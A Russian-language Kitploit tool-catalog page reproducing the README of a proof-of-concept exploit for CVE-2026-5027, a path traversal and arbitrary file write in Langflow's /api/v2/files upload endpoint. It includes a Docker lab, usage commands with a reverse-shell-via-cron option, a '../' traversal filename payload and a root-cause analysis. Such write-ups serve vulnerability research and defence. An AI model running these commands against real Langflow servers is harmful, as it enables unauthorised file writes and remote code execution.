Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5027 — Эксплойт proof-of-concept для CVE-2026-5027 — обход пути и произвольная запись файлов в эндпоинте /api/v2/files Langflow, с Docker-лабораторией и опцией reverse shell. | Kitploit
Инструменты/GitHubGitHub/yym8538/cve-2026-5027
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubyym8538/cve-2026-5027

CVE-2026-5027

Эксплойт proof-of-concept для CVE-2026-5027 — обход пути и произвольная запись файлов в эндпоинте /api/v2/files Langflow, с Docker-лабораторией и опцией reverse shell.

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Этот пост представляет собой исследовательскую статью, опубликованную EQSTLab.

Благодарим Yahia Hamza, который сообщил об этой уязвимости и проанализировал её.

CVE-2026-5027

★ CVE-2026-5027 Langflow Path Traversal / Arbitrary File Write PoC ★ CVE-2026-5027 PoC test


Описание

CVE-2026-5027 : Уязвимость произвольной записи файлов в Langflow

описание: Уязвимость обхода пути в Langflow <= 1.8.4 позволяет злоумышленникам записывать произвольные файлы за пределами предполагаемого каталога загрузки через специально сформированное multipart-поле filename, передаваемое в эндпоинт /api/v2/files. В развёртываниях, где включён авто-вход или аутентификация иным образом слабо реализована, эта проблема может быть использована для достижения удалённого выполнения кода путём записи контролируемого злоумышленником содержимого в чувствительные места файловой системы.


Настройка лаборатории

Соберите и запустите уязвимую среду с помощью Docker:

Сборка образа

root@kitploit:~
docker build -t cve-2026-5027 .

Запуск контейнера

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

Как использовать

Запуск

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

Анализ

Уязвимый эндпоинт

root@kitploit:~
POST /api/v2/files

Проблема существует потому, что функциональность загрузки доверяет значению multipart-поля filename, предоставленному клиентом. Вместо генерации безопасного имени для хранения на стороне сервера или ограничения разрешённого пути выделенным каталогом загрузки, уязвимый участок кода позволяет последовательностям обхода, таким как ../, влиять на итоговый путь назначения.

В результате злоумышленник может выйти за пределы предполагаемого корня хранилища и заставить приложение записывать файлы в произвольные места файловой системы сервера.

Типичный сценарий эксплуатации выглядит следующим образом:

  1. Получить токен доступа через обычный вход или развёртывание с включённым авто-входом.
  2. Отправить multipart-запрос на загрузку в /api/v2/files.
  3. Передать специально сформированное поле filename, содержащее последовательности обхода пути.
  4. Заставить Langflow записать контролируемое злоумышленником содержимое за пределами ожидаемого каталога хранения.

По своей сути это проблема CWE-22: Improper Limitation of a Pathname to a Restricted Directory.

Техническая первопричина

Уязвимость безопасности вызвана недостаточной очисткой и валидацией контролируемых пользователем путей к файлам при обработке загрузки. Приложение принимает исходное имя файла от клиента и передаёт его в процесс сохранения без должного обеспечения нормализации и ограничения пути.

С точки зрения защиты, опасный шаблон концептуально похож на следующий:

root@kitploit:~
save_path = base_dir / file.filename

Если file.filename содержит компоненты обхода пути, такие как:

root@kitploit:~
../../../../tmp/poc.txt

итоговый разрешённый путь может указывать за пределы base_dir, что позволяет осуществлять произвольную запись файлов.

Почему это важно

Уязвимости произвольной записи файлов часто более серьёзны, чем стандартные проблемы неограниченной загрузки, потому что злоумышленник контролирует не только содержимое файла, но и путь назначения. В зависимости от привилегий выполнения процесса Langflow это может позволить:

  • перезапись файлов приложения
  • изменение файлов запуска или запланированных задач
  • закрепление через файлы инициализации оболочки или ключевые файлы
  • повышение от произвольной записи файлов до удалённого выполнения кода

Сценарий

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

Отказ от ответственности

Этот репозиторий не предназначен для содействия несанкционированной эксплуатации экземпляров Langflow. Цель этого проекта — помочь исследователям безопасности, защитникам и разработчикам понять уязвимость, проверить подверженность в контролируемых средах и применить эффективные меры защиты.


Ссылки

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

Скачать инструмент